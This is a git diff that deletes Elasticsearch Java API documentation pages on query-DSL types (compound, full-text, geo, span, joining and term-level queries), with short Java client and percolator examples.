deleted file mode 100644 index 2c8dfc7a88c..00000000000 --- a/docs/java-api/query-dsl/common-terms-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-common-terms-query]] -==== Common Terms Query - -See {ref}/query-dsl-common-terms-query.html[Common Terms Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[common_terms] --------------------------------------------------- -<1> field -<2> value diff --git a/docs/java-api/query-dsl/compound-queries.asciidoc b/docs/java-api/query-dsl/compound-queries.asciidoc deleted file mode 100644 index b93e3b694a5..00000000000 --- a/docs/java-api/query-dsl/compound-queries.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ -[[java-compound-queries]] -=== Compound queries - -Compound queries wrap other compound or leaf queries, either to combine their -results and scores, to change their behaviour, or to switch from query to -filter context. - -The queries in this group are: - -<>:: - -A query which wraps another query, but executes it in filter context. All -matching documents are given the same ``constant'' `_score`. - -<>:: - -The default query for combining multiple leaf or compound query clauses, as -`must`, `should`, `must_not`, or `filter` clauses. The `must` and `should` -clauses have their scores combined -- the more matching clauses, the better -- -while the `must_not` and `filter` clauses are executed in filter context. - -<>:: - -A query which accepts multiple queries, and returns any documents which match -any of the query clauses. While the `bool` query combines the scores from all -matching queries, the `dis_max` query uses the score of the single best- -matching query clause. - -<>:: - -Modify the scores returned by the main query with functions to take into -account factors like popularity, recency, distance, or custom algorithms -implemented with scripting. - -<>:: - -Return documents which match a `positive` query, but reduce the score of -documents which also match a `negative` query. - - -include::constant-score-query.asciidoc[] -include::bool-query.asciidoc[] -include::dis-max-query.asciidoc[] -include::function-score-query.asciidoc[] -include::boosting-query.asciidoc[] diff --git a/docs/java-api/query-dsl/constant-score-query.asciidoc b/docs/java-api/query-dsl/constant-score-query.asciidoc deleted file mode 100644 index 49c5adbee6a..00000000000 --- a/docs/java-api/query-dsl/constant-score-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-constant-score-query]] -==== Constant Score Query - -See {ref}/query-dsl-constant-score-query.html[Constant Score Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[constant_score] --------------------------------------------------- -<1> your query -<2> query score diff --git a/docs/java-api/query-dsl/dis-max-query.asciidoc b/docs/java-api/query-dsl/dis-max-query.asciidoc deleted file mode 100644 index 8c91bcb9901..00000000000 --- a/docs/java-api/query-dsl/dis-max-query.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-query-dsl-dis-max-query]] -==== Dis Max Query - -See {ref}/query-dsl-dis-max-query.html[Dis Max Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[dis_max] --------------------------------------------------- -<1> add your queries -<2> add your queries -<3> boost factor -<4> tie breaker diff --git a/docs/java-api/query-dsl/exists-query.asciidoc b/docs/java-api/query-dsl/exists-query.asciidoc deleted file mode 100644 index 6fa5ba6a6f2..00000000000 --- a/docs/java-api/query-dsl/exists-query.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[[java-query-dsl-exists-query]] -==== Exists Query - -See {ref}/query-dsl-exists-query.html[Exists Query]. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[exists] --------------------------------------------------- -<1> field diff --git a/docs/java-api/query-dsl/full-text-queries.asciidoc b/docs/java-api/query-dsl/full-text-queries.asciidoc deleted file mode 100644 index 27ce4bee1ba..00000000000 --- a/docs/java-api/query-dsl/full-text-queries.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[java-full-text-queries]] -=== Full text queries - -The high-level full text queries are usually used for running full text -queries on full text fields like the body of an email. They understand how the -field being queried is analyzed and will apply each field's -`analyzer` (or `search_analyzer`) to the query string before executing. - -The queries in this group are: - -<>:: - - The standard query for performing full text queries, including fuzzy matching - and phrase or proximity queries. - -<>:: - - The multi-field version of the `match` query. - -<>:: - - A more specialized query which gives more preference to uncommon words. - -<>:: - - Supports the compact Lucene query string syntax, - allowing you to specify AND|OR|NOT conditions and multi-field search - within a single query string. For expert users only. - -<>:: - - A simpler, more robust version of the `query_string` syntax suitable - for exposing directly to users. - -include::match-query.asciidoc[] - -include::multi-match-query.asciidoc[] - -include::common-terms-query.asciidoc[] - -include::query-string-query.asciidoc[] - -include::simple-query-string-query.asciidoc[] - diff --git a/docs/java-api/query-dsl/function-score-query.asciidoc b/docs/java-api/query-dsl/function-score-query.asciidoc deleted file mode 100644 index fcd5f2dc473..00000000000 --- a/docs/java-api/query-dsl/function-score-query.asciidoc +++ /dev/null @@ -1,19 +0,0 @@ -[[java-query-dsl-function-score-query]] -==== Function Score Query - -See {ref}/query-dsl-function-score-query.html[Function Score Query]. - -To use `ScoreFunctionBuilders` just import them in your class: - -[source,java] --------------------------------------------------- -import static org.elasticsearch.index.query.functionscore.ScoreFunctionBuilders.*; --------------------------------------------------- - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[function_score] --------------------------------------------------- -<1> Add a first function based on a query -<2> And randomize the score based on a given seed -<3> Add another function based on the age field diff --git a/docs/java-api/query-dsl/fuzzy-query.asciidoc b/docs/java-api/query-dsl/fuzzy-query.asciidoc deleted file mode 100644 index 4a7bde82cdf..00000000000 --- a/docs/java-api/query-dsl/fuzzy-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-fuzzy-query]] -==== Fuzzy Query - -See {ref}/query-dsl-fuzzy-query.html[Fuzzy Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[fuzzy] --------------------------------------------------- -<1> field -<2> text diff --git a/docs/java-api/query-dsl/geo-bounding-box-query.asciidoc b/docs/java-api/query-dsl/geo-bounding-box-query.asciidoc deleted file mode 100644 index 4983a212133..00000000000 --- a/docs/java-api/query-dsl/geo-bounding-box-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-geo-bounding-box-query]] -==== Geo Bounding Box Query - -See {ref}/query-dsl-geo-bounding-box-query.html[Geo Bounding Box Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_bounding_box] --------------------------------------------------- -<1> field -<2> bounding box top left point -<3> bounding box bottom right point diff --git a/docs/java-api/query-dsl/geo-distance-query.asciidoc b/docs/java-api/query-dsl/geo-distance-query.asciidoc deleted file mode 100644 index cc8c89ca61e..00000000000 --- a/docs/java-api/query-dsl/geo-distance-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-geo-distance-query]] -==== Geo Distance Query - -See {ref}/query-dsl-geo-distance-query.html[Geo Distance Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_distance] --------------------------------------------------- -<1> field -<2> center point -<3> distance from center point diff --git a/docs/java-api/query-dsl/geo-polygon-query.asciidoc b/docs/java-api/query-dsl/geo-polygon-query.asciidoc deleted file mode 100644 index 7dbf49b8d1a..00000000000 --- a/docs/java-api/query-dsl/geo-polygon-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-geo-polygon-query]] -==== Geo Polygon Query - -See {ref}/query-dsl-geo-polygon-query.html[Geo Polygon Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_polygon] --------------------------------------------------- -<1> add your polygon of points a document should fall within -<2> initialise the query with field and points diff --git a/docs/java-api/query-dsl/geo-queries.asciidoc b/docs/java-api/query-dsl/geo-queries.asciidoc deleted file mode 100644 index 10df4ff5e87..00000000000 --- a/docs/java-api/query-dsl/geo-queries.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[java-geo-queries]] -=== Geo queries - -Elasticsearch supports two types of geo data: -`geo_point` fields which support lat/lon pairs, and -`geo_shape` fields, which support points, lines, circles, polygons, multi-polygons etc. - -The queries in this group are: - -<> query:: - - Find document with geo-shapes which either intersect, are contained by, or - do not intersect with the specified geo-shape. - -<> query:: - - Finds documents with geo-points that fall into the specified rectangle. - -<> query:: - - Finds document with geo-points within the specified distance of a central - point. - -<> query:: - - Find documents with geo-points within the specified polygon. - -include::geo-shape-query.asciidoc[] - -include::geo-bounding-box-query.asciidoc[] - -include::geo-distance-query.asciidoc[] - -include::geo-polygon-query.asciidoc[] diff --git a/docs/java-api/query-dsl/geo-shape-query.asciidoc b/docs/java-api/query-dsl/geo-shape-query.asciidoc deleted file mode 100644 index c2cd4c14e3a..00000000000 --- a/docs/java-api/query-dsl/geo-shape-query.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[java-query-dsl-geo-shape-query]] -==== GeoShape Query - -See {ref}/query-dsl-geo-shape-query.html[Geo Shape Query] - -Note: the `geo_shape` type uses `Spatial4J` and `JTS`, both of which are -optional dependencies. Consequently you must add `Spatial4J` and `JTS` -to your classpath in order to use this type: - -[source,xml] ------------------------------------------------ - - org.locationtech.spatial4j - spatial4j - 0.7 <1> - - - - org.locationtech.jts - jts-core - 1.15.0 <2> - - - xerces - xercesImpl - - - ------------------------------------------------ -<1> check for updates in http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.locationtech.spatial4j%22%20AND%20a%3A%22spatial4j%22[Maven Central] -<2> check for updates in http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.locationtech.jts%22%20AND%20a%3A%22jts-core%22[Maven Central] - -[source,java] --------------------------------------------------- -// Import ShapeRelation and ShapeBuilder -import org.elasticsearch.common.geo.ShapeRelation; -import org.elasticsearch.common.geo.builders.ShapeBuilder; --------------------------------------------------- - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[geo_shape] --------------------------------------------------- -<1> field -<2> shape -<3> relation can be `ShapeRelation.CONTAINS`, `ShapeRelation.WITHIN`, `ShapeRelation.INTERSECTS` or `ShapeRelation.DISJOINT` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[indexed_geo_shape] --------------------------------------------------- -<1> field -<2> The ID of the document that containing the pre-indexed shape. -<3> relation -<4> Name of the index where the pre-indexed shape is. Defaults to 'shapes'. -<5> The field specified as path containing the pre-indexed shape. Defaults to 'shape'. diff --git a/docs/java-api/query-dsl/has-child-query.asciidoc b/docs/java-api/query-dsl/has-child-query.asciidoc deleted file mode 100644 index f47f3af487d..00000000000 --- a/docs/java-api/query-dsl/has-child-query.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-query-dsl-has-child-query]] -==== Has Child Query - -See {ref}/query-dsl-has-child-query.html[Has Child Query] - -When using the `has_child` query it is important to use the `PreBuiltTransportClient` instead of the regular client: - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder().put("cluster.name", "elasticsearch").build(); -TransportClient client = new PreBuiltTransportClient(settings); -client.addTransportAddress(new TransportAddress(new InetSocketAddress(InetAddresses.forString("127.0.0.1"), 9300))); --------------------------------------------------- - -Otherwise the parent-join module doesn't get loaded and the `has_child` query can't be used from the transport client. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[has_child] --------------------------------------------------- -<1> child type to query against -<2> query -<3> score mode can be `ScoreMode.Avg`, `ScoreMode.Max`, `ScoreMode.Min`, `ScoreMode.None` or `ScoreMode.Total` diff --git a/docs/java-api/query-dsl/has-parent-query.asciidoc b/docs/java-api/query-dsl/has-parent-query.asciidoc deleted file mode 100644 index 6a83fe2b069..00000000000 --- a/docs/java-api/query-dsl/has-parent-query.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-query-dsl-has-parent-query]] -==== Has Parent Query - -See {ref}/query-dsl-has-parent-query.html[Has Parent] - -When using the `has_parent` query it is important to use the `PreBuiltTransportClient` instead of the regular client: - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder().put("cluster.name", "elasticsearch").build(); -TransportClient client = new PreBuiltTransportClient(settings); -client.addTransportAddress(new TransportAddress(new InetSocketAddress(InetAddresses.forString("127.0.0.1"), 9300))); --------------------------------------------------- - -Otherwise the parent-join module doesn't get loaded and the `has_parent` query can't be used from the transport client. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[has_parent] --------------------------------------------------- -<1> parent type to query against -<2> query -<3> whether the score from the parent hit should propagate to the child hit diff --git a/docs/java-api/query-dsl/ids-query.asciidoc b/docs/java-api/query-dsl/ids-query.asciidoc deleted file mode 100644 index ba12a5df38b..00000000000 --- a/docs/java-api/query-dsl/ids-query.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[[java-query-dsl-ids-query]] -==== Ids Query - - -See {ref}/query-dsl-ids-query.html[Ids Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[ids] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/joining-queries.asciidoc b/docs/java-api/query-dsl/joining-queries.asciidoc deleted file mode 100644 index fcefef5f624..00000000000 --- a/docs/java-api/query-dsl/joining-queries.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[java-joining-queries]] -=== Joining queries - -Performing full SQL-style joins in a distributed system like Elasticsearch is -prohibitively expensive. Instead, Elasticsearch offers two forms of join -which are designed to scale horizontally. - -<>:: - -Documents may contains fields of type `nested`. These -fields are used to index arrays of objects, where each object can be queried -(with the `nested` query) as an independent document. - -<> and <> queries:: - -A parent-child relationship can exist between two -document types within a single index. The `has_child` query returns parent -documents whose child documents match the specified query, while the -`has_parent` query returns child documents whose parent document matches the -specified query. - -include::nested-query.asciidoc[] - -include::has-child-query.asciidoc[] - -include::has-parent-query.asciidoc[] - - diff --git a/docs/java-api/query-dsl/match-all-query.asciidoc b/docs/java-api/query-dsl/match-all-query.asciidoc deleted file mode 100644 index 85d847528f5..00000000000 --- a/docs/java-api/query-dsl/match-all-query.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -[[java-query-dsl-match-all-query]] -=== Match All Query - -See {ref}/query-dsl-match-all-query.html[Match All Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[match_all] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/match-query.asciidoc b/docs/java-api/query-dsl/match-query.asciidoc deleted file mode 100644 index 6884deb5f1f..00000000000 --- a/docs/java-api/query-dsl/match-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-match-query]] -==== Match Query - -See {ref}/query-dsl-match-query.html[Match Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[match] --------------------------------------------------- -<1> field -<2> text diff --git a/docs/java-api/query-dsl/mlt-query.asciidoc b/docs/java-api/query-dsl/mlt-query.asciidoc deleted file mode 100644 index 11e5c7ef404..00000000000 --- a/docs/java-api/query-dsl/mlt-query.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-query-dsl-mlt-query]] -==== More Like This Query - -See {ref}/query-dsl-mlt-query.html[More Like This Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[more_like_this] --------------------------------------------------- -<1> fields -<2> text -<3> ignore threshold -<4> max num of Terms in generated queries diff --git a/docs/java-api/query-dsl/multi-match-query.asciidoc b/docs/java-api/query-dsl/multi-match-query.asciidoc deleted file mode 100644 index 86b384d44d3..00000000000 --- a/docs/java-api/query-dsl/multi-match-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-multi-match-query]] -==== Multi Match Query - -See {ref}/query-dsl-multi-match-query.html[Multi Match Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[multi_match] --------------------------------------------------- -<1> text -<2> fields diff --git a/docs/java-api/query-dsl/nested-query.asciidoc b/docs/java-api/query-dsl/nested-query.asciidoc deleted file mode 100644 index 9b675ea72ac..00000000000 --- a/docs/java-api/query-dsl/nested-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-nested-query]] -==== Nested Query - -See {ref}/query-dsl-nested-query.html[Nested Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[nested] --------------------------------------------------- -<1> path to nested document -<2> your query. Any fields referenced inside the query must use the complete path (fully qualified). -<3> score mode could be `ScoreMode.Max`, `ScoreMode.Min`, `ScoreMode.Total`, `ScoreMode.Avg` or `ScoreMode.None` diff --git a/docs/java-api/query-dsl/percolate-query.asciidoc b/docs/java-api/query-dsl/percolate-query.asciidoc deleted file mode 100644 index 18cdd4a14e5..00000000000 --- a/docs/java-api/query-dsl/percolate-query.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[java-query-percolate-query]] -==== Percolate Query - -See: - * {ref}/query-dsl-percolate-query.html[Percolate Query] - - -[source,java] --------------------------------------------------- -Settings settings = Settings.builder().put("cluster.name", "elasticsearch").build(); -TransportClient client = new PreBuiltTransportClient(settings); -client.addTransportAddress(new TransportAddress(new InetSocketAddress(InetAddresses.forString("127.0.0.1"), 9300))); --------------------------------------------------- - -Before the `percolate` query can be used an `percolator` mapping should be added and -a document containing a percolator query should be indexed: - -[source,java] --------------------------------------------------- -// create an index with a percolator field with the name 'query': -client.admin().indices().prepareCreate("myIndexName") - .addMapping("_doc", "query", "type=percolator", "content", "type=text") - .get(); - -//This is the query we're registering in the percolator -QueryBuilder qb = termQuery("content", "amazing"); - -//Index the query = register it in the percolator -client.prepareIndex("myIndexName", "_doc", "myDesignatedQueryName") - .setSource(jsonBuilder() - .startObject() - .field("query", qb) // Register the query - .endObject()) - .setRefreshPolicy(RefreshPolicy.IMMEDIATE) // Needed when the query shall be available immediately - .get(); --------------------------------------------------- - -This indexes the above term query under the name -*myDesignatedQueryName*. - -In order to check a document against the registered queries, use this -code: - -[source,java] --------------------------------------------------- -//Build a document to check against the percolator -XContentBuilder docBuilder = XContentFactory.jsonBuilder().startObject(); -docBuilder.field("content", "This is amazing!"); -docBuilder.endObject(); //End of the JSON root object - -PercolateQueryBuilder percolateQuery = new PercolateQueryBuilder("query", "_doc", BytesReference.bytes(docBuilder)); - -// Percolate, by executing the percolator query in the query dsl: -SearchResponse response = client().prepareSearch("myIndexName") - .setQuery(percolateQuery)) - .get(); -//Iterate over the results -for(SearchHit hit : response.getHits()) { - // Percolator queries as hit -} --------------------------------------------------- diff --git a/docs/java-api/query-dsl/prefix-query.asciidoc b/docs/java-api/query-dsl/prefix-query.asciidoc deleted file mode 100644 index eb15c4426f6..00000000000 --- a/docs/java-api/query-dsl/prefix-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-prefix-query]] -==== Prefix Query - -See {ref}/query-dsl-prefix-query.html[Prefix Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[prefix] --------------------------------------------------- -<1> field -<2> prefix diff --git a/docs/java-api/query-dsl/query-string-query.asciidoc b/docs/java-api/query-dsl/query-string-query.asciidoc deleted file mode 100644 index 7d8bead2e34..00000000000 --- a/docs/java-api/query-dsl/query-string-query.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -[[java-query-dsl-query-string-query]] -==== Query String Query - -See {ref}/query-dsl-query-string-query.html[Query String Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[query_string] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/range-query.asciidoc b/docs/java-api/query-dsl/range-query.asciidoc deleted file mode 100644 index 2d58fbd3a34..00000000000 --- a/docs/java-api/query-dsl/range-query.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[java-query-dsl-range-query]] -==== Range Query - -See {ref}/query-dsl-range-query.html[Range Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[range] --------------------------------------------------- -<1> field -<2> from -<3> to -<4> include lower value means that `from` is `gt` when `false` or `gte` when `true` -<5> include upper value means that `to` is `lt` when `false` or `lte` when `true` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[range_simplified] --------------------------------------------------- -<1> field -<2> set `from` to 10 and `includeLower` to `true` -<3> set `to` to 20 and `includeUpper` to `false` diff --git a/docs/java-api/query-dsl/regexp-query.asciidoc b/docs/java-api/query-dsl/regexp-query.asciidoc deleted file mode 100644 index f9cd8cd72d9..00000000000 --- a/docs/java-api/query-dsl/regexp-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-regexp-query]] -==== Regexp Query - -See {ref}/query-dsl-regexp-query.html[Regexp Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[regexp] --------------------------------------------------- -<1> field -<2> regexp diff --git a/docs/java-api/query-dsl/script-query.asciidoc b/docs/java-api/query-dsl/script-query.asciidoc deleted file mode 100644 index a8c60f1d8eb..00000000000 --- a/docs/java-api/query-dsl/script-query.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[java-query-dsl-script-query]] -==== Script Query - -See {ref}/query-dsl-script-query.html[Script Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[script_inline] --------------------------------------------------- -<1> inlined script - - -If you have stored on each data node a script named `myscript.painless` with: - -[source,painless] --------------------------------------------------- -doc['num1'].value > params.param1 --------------------------------------------------- - -You can use it then with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[script_file] --------------------------------------------------- -<1> Script type: either `ScriptType.FILE`, `ScriptType.INLINE` or `ScriptType.INDEXED` -<2> Scripting engine -<3> Script name -<4> Parameters as a `Map` diff --git a/docs/java-api/query-dsl/simple-query-string-query.asciidoc b/docs/java-api/query-dsl/simple-query-string-query.asciidoc deleted file mode 100644 index c3b32ecd1cb..00000000000 --- a/docs/java-api/query-dsl/simple-query-string-query.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -[[java-query-dsl-simple-query-string-query]] -==== Simple Query String Query - -See {ref}/query-dsl-simple-query-string-query.html[Simple Query String Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[simple_query_string] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/span-containing-query.asciidoc b/docs/java-api/query-dsl/span-containing-query.asciidoc deleted file mode 100644 index 173e26952c2..00000000000 --- a/docs/java-api/query-dsl/span-containing-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-containing-query]] -==== Span Containing Query - -See {ref}/query-dsl-span-containing-query.html[Span Containing Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_containing] --------------------------------------------------- -<1> `big` part -<2> `little` part diff --git a/docs/java-api/query-dsl/span-first-query.asciidoc b/docs/java-api/query-dsl/span-first-query.asciidoc deleted file mode 100644 index d02c164754c..00000000000 --- a/docs/java-api/query-dsl/span-first-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-first-query]] -==== Span First Query - -See {ref}/query-dsl-span-first-query.html[Span First Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_first] --------------------------------------------------- -<1> query -<2> max end position diff --git a/docs/java-api/query-dsl/span-multi-term-query.asciidoc b/docs/java-api/query-dsl/span-multi-term-query.asciidoc deleted file mode 100644 index eea00f61fe7..00000000000 --- a/docs/java-api/query-dsl/span-multi-term-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-multi-term-query]] -==== Span Multi Term Query - -See {ref}/query-dsl-span-multi-term-query.html[Span Multi Term Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_multi] --------------------------------------------------- -<1> Can be any builder extending the `MultiTermQueryBuilder` class. For example: `FuzzyQueryBuilder`, -`PrefixQueryBuilder`, `RangeQueryBuilder`, `RegexpQueryBuilder` or `WildcardQueryBuilder`. diff --git a/docs/java-api/query-dsl/span-near-query.asciidoc b/docs/java-api/query-dsl/span-near-query.asciidoc deleted file mode 100644 index 6f4661e34c9..00000000000 --- a/docs/java-api/query-dsl/span-near-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-span-near-query]] -==== Span Near Query - -See {ref}/query-dsl-span-near-query.html[Span Near Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_near] --------------------------------------------------- -<1> span term queries -<2> slop factor: the maximum number of intervening unmatched positions -<3> whether matches are required to be in-order diff --git a/docs/java-api/query-dsl/span-not-query.asciidoc b/docs/java-api/query-dsl/span-not-query.asciidoc deleted file mode 100644 index 001c2ca025e..00000000000 --- a/docs/java-api/query-dsl/span-not-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-not-query]] -==== Span Not Query - -See {ref}/query-dsl-span-not-query.html[Span Not Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_not] --------------------------------------------------- -<1> span query whose matches are filtered -<2> span query whose matches must not overlap those returned diff --git a/docs/java-api/query-dsl/span-or-query.asciidoc b/docs/java-api/query-dsl/span-or-query.asciidoc deleted file mode 100644 index 787628b5934..00000000000 --- a/docs/java-api/query-dsl/span-or-query.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[[java-query-dsl-span-or-query]] -==== Span Or Query - -See {ref}/query-dsl-span-or-query.html[Span Or Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_or] --------------------------------------------------- -<1> span term queries diff --git a/docs/java-api/query-dsl/span-queries.asciidoc b/docs/java-api/query-dsl/span-queries.asciidoc deleted file mode 100644 index 0ccbe30638c..00000000000 --- a/docs/java-api/query-dsl/span-queries.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[java-span-queries]] -=== Span queries - -Span queries are low-level positional queries which provide expert control -over the order and proximity of the specified terms. These are typically used -to implement very specific queries on legal documents or patents. - -Span queries cannot be mixed with non-span queries (with the exception of the `span_multi` query). - -The queries in this group are: - -<>:: - -The equivalent of the <> but for use with -other span queries. - -<>:: - -Wraps a <>, <>, -<>, <>, -<>, or <> query. - -<>:: - -Accepts another span query whose matches must appear within the first N -positions of the field. - -<>:: - -Accepts multiple span queries whose matches must be within the specified distance of each other, and possibly in the same order. - -<>:: - -Combines multiple span queries -- returns documents which match any of the -specified queries. - -<>:: - -Wraps another span query, and excludes any documents which match that query. - -<>:: - -Accepts a list of span queries, but only returns those spans which also match a second span query. - -<>:: - -The result from a single span query is returned as long is its span falls -within the spans returned by a list of other span queries. - - -include::span-term-query.asciidoc[] - -include::span-multi-term-query.asciidoc[] - -include::span-first-query.asciidoc[] - -include::span-near-query.asciidoc[] - -include::span-or-query.asciidoc[] - -include::span-not-query.asciidoc[] - -include::span-containing-query.asciidoc[] - -include::span-within-query.asciidoc[] diff --git a/docs/java-api/query-dsl/span-term-query.asciidoc b/docs/java-api/query-dsl/span-term-query.asciidoc deleted file mode 100644 index 2bdf9276515..00000000000 --- a/docs/java-api/query-dsl/span-term-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-term-query]] -==== Span Term Query - -See {ref}/query-dsl-span-term-query.html[Span Term Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_term] --------------------------------------------------- -<1> field -<2> value diff --git a/docs/java-api/query-dsl/span-within-query.asciidoc b/docs/java-api/query-dsl/span-within-query.asciidoc deleted file mode 100644 index afa527c0b67..00000000000 --- a/docs/java-api/query-dsl/span-within-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-within-query]] -==== Span Within Query - -See {ref}/query-dsl-span-within-query.html[Span Within Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_within] --------------------------------------------------- -<1> `big` part -<2> `little` part diff --git a/docs/java-api/query-dsl/special-queries.asciidoc b/docs/java-api/query-dsl/special-queries.asciidoc deleted file mode 100644 index bca3bde3b3f..00000000000 --- a/docs/java-api/query-dsl/special-queries.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[java-specialized-queries]] - -=== Specialized queries - -This group contains queries which do not fit into the other groups: - -<>:: - -This query finds documents which are similar to the specified text, document, -or collection of documents. - -<>:: - -This query allows a script to act as a filter. Also see the -<>. - -<>:: - -This query finds percolator queries based on documents. - -<>:: - -A query that accepts other queries as json or yaml string. - -include::mlt-query.asciidoc[] - -include::script-query.asciidoc[] - -include::percolate-query.asciidoc[] - -include::wrapper-query.asciidoc[] diff --git a/docs/java-api/query-dsl/term-level-queries.asciidoc b/docs/java-api/query-dsl/term-level-queries.asciidoc deleted file mode 100644 index e7d5ad4e52b..00000000000 --- a/docs/java-api/query-dsl/term-level-queries.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[java-term-level-queries]] -=== Term level queries - -While the <> will analyze the query -string before executing, the _term-level queries_ operate on the exact terms -that are stored in the inverted index. - -These queries are usually used for structured data like numbers, dates, and -enums, rather than full text fields. Alternatively, they allow you to craft -low-level queries, foregoing the analysis process. - -The queries in this group are: - -<>:: - - Find documents which contain the exact term specified in the field - specified. - -<>:: - - Find documents which contain any of the exact terms specified in the field - specified. - -<>:: - - Find documents where the field specified contains values (dates, numbers, - or strings) in the range specified. - -<>:: - - Find documents where the field specified contains any non-null value. - -<>:: - - Find documents where the field specified contains terms which being with - the exact prefix specified. - 